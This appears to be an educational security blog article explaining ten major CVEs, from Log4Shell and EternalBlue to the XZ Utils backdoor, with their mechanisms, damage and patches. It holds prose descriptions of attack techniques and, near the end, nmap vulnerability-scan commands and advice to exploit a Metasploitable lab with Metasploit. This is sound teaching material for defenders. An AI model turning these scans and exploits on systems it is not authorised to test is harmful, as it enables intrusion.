The best way to understand how to defend systems is to understand exactly how they were broken. Every major CVE in history is a masterclass in how attackers think, how software fails, and how a single overlooked vulnerability can cascade into a global crisis. Log4Shell brought down enterprise infrastructure worldwide. EternalBlue powered the WannaCry ransomware that paralysed hospitals. Heartbleed silently exposed private keys, passwords, and session tokens for two years before anyone noticed.
This guide walks through 10 of the most important CVEs ever disclosed — not just what they are, but how they worked at a technical level, the real-world damage they caused, how they were patched, and critically — what you as an ethical hacker or security professional must take away from each one. Whether you are preparing for a SOC Analyst interview, studying for OSCP, or hunting bugs on HackerOne, understanding these vulnerabilities will make you a better security professional.
At the end you will find a reference table of all 10. Jump to summary table →
- Log4Shell (CVE-2021-44228) — Apache Log4j RCE
- EternalBlue (CVE-2017-0144) — WannaCry / NotPetya
- Heartbleed (CVE-2014-0160) — OpenSSL memory leak
- Shellshock (CVE-2014-6271) — Bash RCE
- BlueKeep (CVE-2019-0708) — RDP wormable RCE
- PrintNightmare (CVE-2021-34527) — Windows Print Spooler
- Spring4Shell (CVE-2022-22965) — Spring Framework RCE
- Citrix Bleed (CVE-2023-4966) — Session token leak
- MOVEit Transfer (CVE-2023-34362) — SQL injection
- XZ Utils Backdoor (CVE-2024-3094) — Supply chain attack
- Summary reference table — all 10 CVEs
- Frequently asked questions
Log4j is a Java logging library used in an estimated 3 billion devices worldwide — from enterprise servers to cloud platforms to video games (including Minecraft). Log4Shell is a critical vulnerability in Log4j versions 2.0-beta9 through 2.14.1 that allows an attacker to execute arbitrary code on any server that logs attacker-controlled input.
The beauty — and horror — of Log4Shell is its simplicity. Log4j had a feature called JNDI (Java Naming and Directory Interface) lookup that allowed it to dynamically load content from external servers. An attacker only needed to get a target application to log a specific string.
The attacker sends a malicious string in any field the server logs — a username, HTTP header, User-Agent, search query, or even a Wi-Fi network name. When Log4j processes the string, it interprets the JNDI lookup instruction, reaches out to the attacker's server, downloads a malicious Java class file, and executes it on the target machine.
- Within 72 hours of disclosure, over 1.8 million exploitation attempts were observed globally
- Affected products included Apple iCloud, Amazon AWS, Microsoft Azure, Cloudflare, Tesla, Twitter, Minecraft, and thousands of enterprise Java applications
- Nation-state APT groups (Iran, North Korea, China, Turkey) were exploiting Log4Shell within hours of public disclosure
- The Belgian Defence Ministry confirmed a breach within days of the CVE going public
- The US CISA called it "one of the most serious vulnerabilities" ever seen and mandated federal agencies patch within days
Apache released Log4j 2.15.0 within days, disabling JNDI lookups by default. A second bypass was immediately found (CVE-2021-45046), requiring 2.16.0. The final fix was 2.17.0. The correct mitigation was updating to Log4j 2.17.1+ or setting log4j2.formatMsgNoLookups=true.
EternalBlue is a vulnerability in Microsoft's SMBv1 (Server Message Block) protocol — the file-sharing protocol used across Windows networks. Originally developed and weaponised by the NSA, it was stolen and leaked by the Shadow Brokers hacking group in April 2017. Microsoft had actually patched it one month earlier (MS17-010 in March 2017) — but millions of Windows machines remained unpatched.
EternalBlue exploits a buffer overflow in the SMBv1 SrvOs2FeaToNt function. By sending a specially crafted packet to port 445, an attacker can write shellcode into kernel memory and execute it with SYSTEM-level privileges — without any authentication, without any user interaction, and without any warning to the victim.
- WannaCry (May 2017) — ransomware using EternalBlue infected 200,000+ machines in 150 countries in 72 hours. UK NHS hospitals were forced to turn away patients. Estimated damage: $4–8 billion.
- NotPetya (June 2017) — a destructive wiper disguised as ransomware, also using EternalBlue. Caused $10 billion in damages globally. Maersk alone lost $300 million and had to reinstall 45,000 PCs and 4,000 servers from scratch.
- EternalBlue remains active in the wild in 2026 — millions of unpatched Windows 7 and Windows Server 2008 machines still exist, particularly in industrial and healthcare environments.
Microsoft released patch MS17-010 in March 2017 — before the leak. In May 2017, Microsoft took the unprecedented step of releasing patches for Windows XP, Vista, and Server 2003 — operating systems it had already ended support for — due to the severity of the outbreak.
Heartbleed is a memory disclosure vulnerability in OpenSSL — the cryptographic library used to implement SSL/TLS encryption for the majority of the internet. It existed silently for over two years (since December 2011) before being discovered in April 2014, meaning attackers potentially had undetected access to private keys, passwords, and session tokens across millions of HTTPS websites.
The bug is in the TLS Heartbeat extension — a mechanism that keeps SSL connections alive. The server was supposed to echo back whatever the client sent in a heartbeat request. But it never verified the claimed length of the message.
The attacker sends a heartbeat request claiming it contains 64KB of data, but actually only sends 1 byte. The vulnerable OpenSSL server echoes back 64KB of server memory — whatever happens to be in those memory addresses at that moment. This could include: private SSL/TLS keys, session tokens, usernames and passwords, encryption keys, and any other data the server has in memory.
- Estimated 17% of all HTTPS web servers were vulnerable at time of disclosure — approximately 500,000 websites
- Major services affected included Yahoo Mail, LastPass, OKCupid, Imgur, and many others
- Canada Revenue Agency had 900 Social Insurance Numbers stolen via Heartbleed and had to take systems offline
- Because the attack left no logs, it is impossible to know how long attackers had been silently exfiltrating data before disclosure
OpenSSL 1.0.1g patched the bug on the same day it was publicly disclosed. The fix: validate that the requested response length does not exceed the actual message length before reading from memory. After patching, all SSL certificates and session tokens had to be reissued because any previously issued cert could have been compromised.
Shellshock is a vulnerability in the GNU Bash shell that had existed for approximately 25 years before being discovered in 2014. Bash allows environment variables to contain function definitions. The bug: Bash would execute any code appended after a function definition in an environment variable — code that should never have been run at all.
This became catastrophic because of CGI (Common Gateway Interface) web scripts — a mechanism where web servers pass HTTP headers and parameters to shell scripts as environment variables. An attacker could embed malicious code in HTTP headers like User-Agent or Referer and have the web server execute it.
- Within 24 hours of disclosure, botnets were actively scanning the entire internet for vulnerable CGI scripts
- Yahoo confirmed a breach via Shellshock — attackers gained access to servers via a vulnerable CGI script
- Shellshock also affected DHCP clients — a malicious DHCP server on the same network could exploit it to compromise Linux machines requesting IP addresses
- Akamai's networks were used to distribute Shellshock-based malware within days
BlueKeep is a use-after-free vulnerability in Windows Remote Desktop Services (RDS) that allows an unauthenticated attacker to execute arbitrary code remotely on systems with RDP exposed on port 3389. Microsoft described it as "wormable" — meaning it could self-propagate across networks the same way WannaCry did — and compared it to EternalBlue in severity.
Affected systems: Windows 7, Windows Server 2003, 2008, and 2008 R2. Windows 8 and Windows 10 were not affected.
The vulnerability exists in the handling of Channel objects in RDP. By sending specially crafted pre-authentication RDP packets, an attacker can free a memory channel object and then trigger code execution in the freed memory region (use-after-free). No user interaction is needed and no authentication is required — connecting to port 3389 is enough.
- At time of disclosure, security researchers identified nearly 1 million internet-facing Windows systems vulnerable to BlueKeep
- A mass exploitation event occurred in November 2019 — attackers deployed cryptocurrency miners via BlueKeep on thousands of machines
- Unlike WannaCry, no large-scale worm emerged — but BlueKeep remains actively used in targeted attacks, particularly against internet-exposed RDP servers (a common vector for ransomware gangs)
- The NSA issued a rare public advisory urging immediate patching
PrintNightmare is a vulnerability in the Windows Print Spooler service that runs on all Windows machines by default. The vulnerability allows any authenticated user — even a low-privileged domain user — to install printer drivers that execute code with SYSTEM-level privileges. It can also be used for remote code execution across a network.
The CVE was accidentally made public before a patch existed when security researchers accidentally published a proof-of-concept on GitHub, believing Microsoft had already released a fix. It was removed within hours but had already been forked hundreds of times.
The Windows Print Spooler allows users to install printer drivers. The AddPrinterDriverEx function does not properly validate the privilege level of the calling user. An attacker with any valid domain credentials can call this function to load a malicious DLL that runs as SYSTEM — giving full control of the machine.
- Ransomware groups including Magniber, Vice Society, and Conti began using PrintNightmare within weeks of disclosure
- Particularly damaging in Active Directory environments — any domain user could escalate to Domain Admin if a Domain Controller had Print Spooler running (which many did by default)
- Microsoft's initial patch was incomplete and bypassed within 24 hours, requiring multiple re-patches over several weeks
Spring4Shell is a critical vulnerability in the Spring Framework — one of the most widely used Java application frameworks in the world, particularly in enterprise environments. The vulnerability allows an unauthenticated attacker to achieve remote code execution by manipulating class loader properties through HTTP request parameters.
The name "Spring4Shell" was coined due to its similarity to Log4Shell — both are Java-based, both are unauthenticated RCE, and both affect frameworks used in millions of enterprise applications. Media comparisons to Log4Shell created significant panic when it was disclosed.
Spring's data binding feature allows HTTP request parameters to be bound to Java object properties. By manipulating parameters that control the class.classLoader object, an attacker can write a malicious JSP web shell to the server's web root — which can then be accessed via the browser to execute arbitrary OS commands.
- Exploitation attempts began within hours of public proof-of-concept code being released
- Mirai botnet variants began incorporating Spring4Shell exploits within days
- Unlike Log4Shell, Spring4Shell had more specific requirements (Java 9+, Tomcat deployment, specific Spring configuration) which limited its overall impact — but targeted exploitation against enterprise Java applications was significant
Citrix Bleed is a sensitive information disclosure vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances — widely used in enterprise networks for load balancing, VPN access, and application delivery. The vulnerability allows an unauthenticated attacker to retrieve valid session tokens from device memory, effectively bypassing authentication and MFA entirely.
The name "Citrix Bleed" was coined due to its similarity to Heartbleed — both leak sensitive data from memory without needing credentials.
By sending a specially crafted HTTP GET request to the NetScaler management interface, an attacker can trigger a buffer over-read that leaks up to 256 bytes of memory per request. This memory frequently contains valid authentication session tokens. With a stolen token, the attacker can log in as any user — including administrators — bypassing passwords and MFA entirely.
- LockBit ransomware group exploited Citrix Bleed to breach Boeing, China Industrial Bank (ICBC), Allen & Overy law firm, and DP World in late 2023
- ICBC's US operations were so severely disrupted that traders had to hand-deliver trade data on USB drives
- Mandiant reported that exploitation had been occurring since at least August 2023 — two months before Citrix disclosed it
- CISA issued an emergency directive mandating federal agencies patch within days
MOVEit Transfer is a managed file transfer (MFT) application used by thousands of enterprises and government agencies to transfer sensitive files securely. The vulnerability is an unauthenticated SQL injection in MOVEit's web application that allows attackers to read, modify, and delete data from the database — and ultimately execute OS commands on the underlying server.
The Cl0p ransomware group exploited this vulnerability in a mass exploitation campaign in May–June 2023, stealing data from over 2,700 organisations before a patch was even publicly available.
The vulnerability exists in the human.aspx endpoint in MOVEit's web application. By manipulating the X-siLock-Comment HTTP header with SQL injection payloads, an attacker can bypass authentication and query the database directly. Cl0p automated this to steal the sysadmin session token from the database and then upload a web shell called LEMURLOOT to the server.
- Over 2,700 organisations confirmed breached — the largest single vulnerability exploitation campaign of 2023
- Victims included US Department of Energy, Shell, British Airways, BBC, Boots pharmacy, Johns Hopkins University, Sony, PricewaterhouseCoopers, Ernst & Young, and many others
- Data from 93 million individuals was stolen and published on Cl0p's leak site
- Total estimated damages exceeded $9.9 billion according to Emsisoft's analysis
The XZ Utils backdoor is unlike any other CVE on this list. It was not a coding mistake — it was a deliberately planted backdoor, inserted by a sophisticated threat actor who spent nearly two years building trust as an open-source contributor before introducing malicious code into a widely-used Linux compression library.
XZ Utils is a data compression library used across virtually all Linux distributions. Because it is linked into systemd — and systemd is linked into sshd (the SSH daemon) on many modern Linux systems — a backdoor in XZ Utils effectively becomes a backdoor in SSH itself. The backdoor was designed to allow the attacker to authenticate to any affected system using a specific private key, bypassing all authentication.
The threat actor, operating under the alias "Jia Tan", began contributing to the XZ Utils project in 2021. Over two years they built a reputation for quality contributions. In 2024 they introduced malicious code into XZ Utils 5.6.0 and 5.6.1, hidden across multiple commits, disguised as test files and build scripts, and obfuscated using multiple layers of encoding.
- The backdoor was caught early — Fedora 41 beta and some rolling-release distros (Arch, Debian Testing) had distributed the vulnerable version, but it had not reached stable releases of major distributions
- The attacker's two-year patient campaign and sophisticated obfuscation techniques suggest a nation-state actor or well-resourced APT group
- If undetected and widely distributed, this would have been the most catastrophic Linux security incident in history — effectively a master key to SSH on every affected system
- The discovery has triggered an industry-wide rethink of open-source supply chain security and maintainer vetting processes
| # | CVE ID | Name | Type | CVSS | Year | Key impact |
|---|---|---|---|---|---|---|
| 1 | CVE-2021-44228 | Log4Shell | RCE | 10.0 | 2021 | 3 billion+ devices, global exploitation within hours |
| 2 | CVE-2017-0144 | EternalBlue | RCE / Wormable | 9.3 | 2017 | WannaCry ($4B damage), NotPetya ($10B damage) |
| 3 | CVE-2014-0160 | Heartbleed | Info Disclosure | 7.5 | 2014 | 500K+ HTTPS sites, private keys exposed silently for 2yrs |
| 4 | CVE-2014-6271 | Shellshock | RCE | 10.0 | 2014 | 25-year-old Bash bug, Yahoo breach, mass botnet exploitation |
| 5 | CVE-2019-0708 | BlueKeep | RCE / Wormable | 9.8 | 2019 | 1M+ vulnerable RDP servers, cryptomining campaigns |
| 6 | CVE-2021-34527 | PrintNightmare | LPE + RCE | 8.8 | 2021 | Low-priv user → SYSTEM, ransomware escalation |
| 7 | CVE-2022-22965 | Spring4Shell | RCE | 9.8 | 2022 | Spring Framework, Mirai botnet exploitation |
| 8 | CVE-2023-4966 | Citrix Bleed | Session Hijack | 9.4 | 2023 | LockBit breached Boeing, ICBC, MFA bypassed |
| 9 | CVE-2023-34362 | MOVEit SQLi | SQLi → RCE | 9.8 | 2023 | 2,700+ orgs breached, 93M records stolen by Cl0p |
| 10 | CVE-2024-3094 | XZ Backdoor | Supply Chain | 10.0 | 2024 | 2-year nation-state campaign targeting Linux SSH |
⚡ Put this knowledge to work
- Scan for these in your lab — set up Metasploitable 2 and run nmap --script vuln against it. You will find EternalBlue (MS17-010), vsftpd backdoor, and more — then use Metasploit to exploit each one. Nmap tutorial →
- Learn the exploitation tools — every CVE here has a Metasploit module. Learn how to use them in an authorised lab environment. Metasploit tutorial →
- Start bug bounty hunting — MOVEit and Spring4Shell style vulnerabilities appear in enterprise web applications on bug bounty programs constantly. Bug bounty beginners guide →
- Follow CVEs as they drop — subscribe to CISA KEV (Known Exploited Vulnerabilities) catalogue, NVD (nvd.nist.gov), and Packet Storm Security for live CVE intelligence.
- Build your Kali toolkit — the commands used to detect and exploit these CVEs are all in your foundational toolkit. Top 20 Kali Linux commands →
CVE stands for Common Vulnerabilities and Exposures. It is a standardised list of publicly disclosed cybersecurity vulnerabilities maintained by MITRE Corporation and sponsored by the US Department of Homeland Security. Each CVE entry gets a unique ID in the format CVE-YEAR-NUMBER (e.g., CVE-2021-44228 for Log4Shell). The CVSS (Common Vulnerability Scoring System) score from 0–10 indicates severity.
Log4Shell (CVE-2021-44228) is widely considered the most dangerous CVE in history due to its combination of a perfect CVSS score of 10.0, unauthenticated remote code execution, and the fact that it affected an estimated 3 billion devices across nearly every major technology company and enterprise application. EternalBlue is a close second due to its role in WannaCry and NotPetya, which caused over $14 billion in combined damages.
The most common methods are: running Nmap with the relevant NSE vulnerability script (e.g., nmap --script smb-vuln-ms17-010 for EternalBlue), using Metasploit's auxiliary scanner modules, running a vulnerability scanner like OpenVAS or Tenable Nessus, or checking the installed software version against the vulnerable version range listed in the CVE database at nvd.nist.gov.
A CVE is simply the standardised identifier and description of a vulnerability — it describes the flaw but does not provide attack code. An exploit is the actual code or technique used to take advantage of the vulnerability. Many CVEs have publicly available proof-of-concept exploits on Exploit-DB or GitHub, and the most critical ones have Metasploit modules that make exploitation accessible without custom code development.
The best sources are: the CISA Known Exploited Vulnerabilities (KEV) catalogue at cisa.gov/known-exploited-vulnerabilities-catalog (the most critical actively exploited CVEs), the National Vulnerability Database at nvd.nist.gov (all CVEs with CVSS scores), vendor security advisories (Microsoft Patch Tuesday, Apache Security Updates, etc.), and The Hacker News for news coverage of major vulnerabilities as they are disclosed.
Yes — all 10 CVEs covered in this guide remain actively exploited in 2026. EternalBlue and BlueKeep still successfully compromise unpatched Windows 7 and Server 2008 machines found in industrial, healthcare, and small business environments. Log4Shell continues to be exploited because many organisations still have unpatched Java applications in their environment. Understanding historical CVEs is not just academic — these vulnerabilities are being used in real attacks against real organisations today.








